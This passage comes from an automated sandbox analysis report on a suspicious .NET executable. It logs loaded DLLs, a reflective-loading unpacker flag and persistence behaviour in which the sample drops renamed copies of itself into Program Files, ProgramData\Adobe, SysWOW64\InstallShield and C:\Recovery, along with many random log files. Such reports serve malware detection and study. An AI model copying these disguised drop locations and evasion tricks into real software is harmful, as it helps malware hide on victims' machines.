                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: mmdevapi.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: devobj.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: ksuser.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: avrt.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: audioses.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: midimap.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: A5EbyKyjhV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: A5EbyKyjhV.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: A5EbyKyjhV.exeStatic file information: File size 2551808 > 1048576
                          Source: A5EbyKyjhV.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x26e800
                          Source: A5EbyKyjhV.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                          Data Obfuscation

                          barindex
                          .NET source code contains potential unpacker
                          Source: A5EbyKyjhV.exe, 1a2.cs.Net Code: ghM System.Reflection.Assembly.Load(byte[])
                          Source: A5EbyKyjhV.exe, 857.cs.Net Code: _736
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeCode function: 0_2_00007FFAAC52739E push ebp; retf 0_2_00007FFAAC5273A8
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeCode function: 0_2_00007FFAAC513CB9 push ebx; retf 0_2_00007FFAAC513CBA
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeCode function: 0_2_00007FFAAC6E752B push ebx; iretd 0_2_00007FFAAC6E756A
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeCode function: 0_2_00007FFAACAA7967 push ebx; retf 0_2_00007FFAACAA796A
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC507BAC push eax; ret 12_2_00007FFAAC507BAD
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC50739E push ebp; retf 12_2_00007FFAAC5073A8
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6C752C push ebx; iretd 12_2_00007FFAAC6C756A
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAACA87967 push ebx; retf 12_2_00007FFAACA8796A

                          Persistence and Installation Behavior

                          barindex
                          Drops executable to a common third party application directory
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile written: C:\ProgramData\Adobe\DZNTXHJCUWXUTqOrRrGotfqdMP.exeJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\JiQSSPWn.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\HSyuVsJS.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\MYHJZLWg.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\tgLOyLgZ.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\RunsezZZ.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\UswiSVHk.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\JMBKMsmH.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\xsCeWCWh.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\pxmXXnNx.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\SHQSLHwr.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\EZjMkwXT.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Windows\SysWOW64\InstallShield\DZNTXHJCUWXUTqOrRrGotfqdMP.exeJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\XMlAJXRO.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\lPgyvanJ.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\ZeaApOeg.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\ejzRghnX.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\DyXMTSsE.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\mEXomrcz.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\gdBhXhQN.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Recovery\RuntimeBroker.exeJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\HbVuFfcO.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\PvGkFmYz.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\HLTcvXUr.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\cJayVGAz.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\wYpmLLZJ.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exeJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\rkXniOKV.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\rAZFtXSs.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\SRkiCrbU.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\PjdKZeCh.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\olJxrfqf.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\gzRpdDAs.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\zuoNrmbc.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\ZPYieGWJ.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\PWlCEuly.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\vRqeFZrR.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\jxryOjbr.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\OsAKJQVe.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\ProgramData\Adobe\DZNTXHJCUWXUTqOrRrGotfqdMP.exeJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\nxFpFSuh.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\lyZggEuH.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\noipVfbk.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\asIaZkme.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\WgArDiDi.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\uHWOOpMo.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\ougxbSJc.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\AlRNHzIf.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\CYBeSaFD.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\ProgramData\Adobe\DZNTXHJCUWXUTqOrRrGotfqdMP.exeJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Windows\SysWOW64\InstallShield\DZNTXHJCUWXUTqOrRrGotfqdMP.exeJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\ZPYieGWJ.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\olJxrfqf.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\gzRpdDAs.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\OsAKJQVe.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\nxFpFSuh.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\cJayVGAz.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\CYBeSaFD.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\rkXniOKV.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\RunsezZZ.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\HLTcvXUr.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\DyXMTSsE.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\XMlAJXRO.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\PjdKZeCh.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\MYHJZLWg.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\vRqeFZrR.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\noipVfbk.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\SRkiCrbU.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\JiQSSPWn.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\tgLOyLgZ.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\jxryOjbr.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\wYpmLLZJ.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\ougxbSJc.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\HSyuVsJS.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\lPgyvanJ.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\AlRNHzIf.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\pxmXXnNx.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\WgArDiDi.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\EZjMkwXT.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\ejzRghnX.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\JMBKMsmH.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\rAZFtXSs.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\asIaZkme.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\HbVuFfcO.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\xsCeWCWh.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\mEXomrcz.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\UswiSVHk.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\uHWOOpMo.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\SHQSLHwr.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\zuoNrmbc.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\gdBhXhQN.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\PWlCEuly.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\lyZggEuH.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\ZeaApOeg.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\PvGkFmYz.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
